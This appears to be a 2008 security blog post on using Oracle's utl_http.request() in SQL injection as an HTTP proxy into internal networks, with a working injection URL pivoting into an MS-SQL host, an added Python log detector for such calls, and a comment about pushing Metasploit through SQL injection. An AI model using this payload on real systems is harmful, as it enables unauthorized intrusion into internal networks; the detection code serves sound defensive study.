Exploiting Internal Networks with Oracle UTL_HTTP package

April 22, 2008

SQL Injection Oracle + MS-SQL

Oracle's utl_http.request() function has been cited a number of times as a way to carry out SQL injection. It is generally used to resolve names, so that an attacker can receive the output of a SQL query over a DNS channel.

However, this function can also be used to make a legitimate HTTP connection to the internal network. Thus, if this function is available, a SQL injection in Oracle can also serve as an HTTP proxy into the internal network.

In the screenshot, I have exploited a SQL injection in MS-SQL Server via a SQL injection in Oracle.

e.g.

http://192.168.1.1/oracle.php?id=1%20union%20all%20select%20utl_http.request('http://192.168.1.2/MSSQL/?p=1/**/union/**/all/**/select/**/null,@@version,null')%20from%20dual
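Detection logic for the request above, added here as an example and not code from the original post: it decodes a logged request, strips the /**/ comment spacing, and reports Oracle outbound calls together with whether the target is an internal address. The function names are illustrative, and the set of calls goes beyond utl_http.request to also cover httpuritype and utl_inaddr.get_host_address.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# Added example (names are illustrative). Oracle calls that reach the network from SQL.
OUTBOUND_CALL = re.compile(
    r"\b(utl_http\s*\.\s*request(?:_pieces)?|httpuritype|"
    r"utl_inaddr\s*\.\s*get_host_address)\s*\(\s*'([^']*)", re.IGNORECASE)
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

def normalize(raw):
    """Undo URL encoding (bounded, to catch double encoding) and /**/ spacing."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", text))

def classify_target(arg):
    """Return 'internal', 'external', 'hostname' or 'unknown' for a call argument."""
    host = None
    try:
        host = urlsplit(arg if "://" in arg else "//" + arg).hostname
        ip = ipaddress.ip_address(host or "")
    except ValueError:
        # Not an IP literal: a name still has to be checked against internal DNS.
        return "hostname" if host else "unknown"
    internal = ip.is_private or ip.is_loopback or ip.is_link_local
    return "internal" if internal else "external"

def scan_request(request_target):
    """List outbound-call findings in one logged request path and query string."""
    return [
        {"function": re.sub(r"\s+", "", m.group(1)).lower(),
         "target": m.group(2), "scope": classify_target(m.group(2))}
        for m in OUTBOUND_CALL.finditer(normalize(request_target))
    ]

# Sample input: the request quoted in this post, as it would appear in an access log.
PAGE_REQUEST = (
    "/oracle.php?id=1%20union%20all%20select%20utl_http.request("
    "'http://192.168.1.2/MSSQL/?p=1/**/union/**/all/**/select/**/"
    "null,@@version,null')%20from%20dual"
)

if __name__ == "__main__":
    print(scan_request(PAGE_REQUEST))
```

A finding with scope "internal" means the database host was asked to fetch from inside the network, which is the proxy behaviour described above.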

Comments

1 Comment

  • belch says:

    In my opinion a big innovation in this kind of attack should be: performing an internal assessment from the outside, by exploiting some kind of application vulnerability, and SQL Injection is such a beautiful candidate. Recently guys from msf have been able to upload a packed version of msf through meterpreter on a compromised host. I also talked with the sqlmap man about this. It should not be too difficult under some circumstances, especially when the backend DBMS is Oracle or M$ SQL.
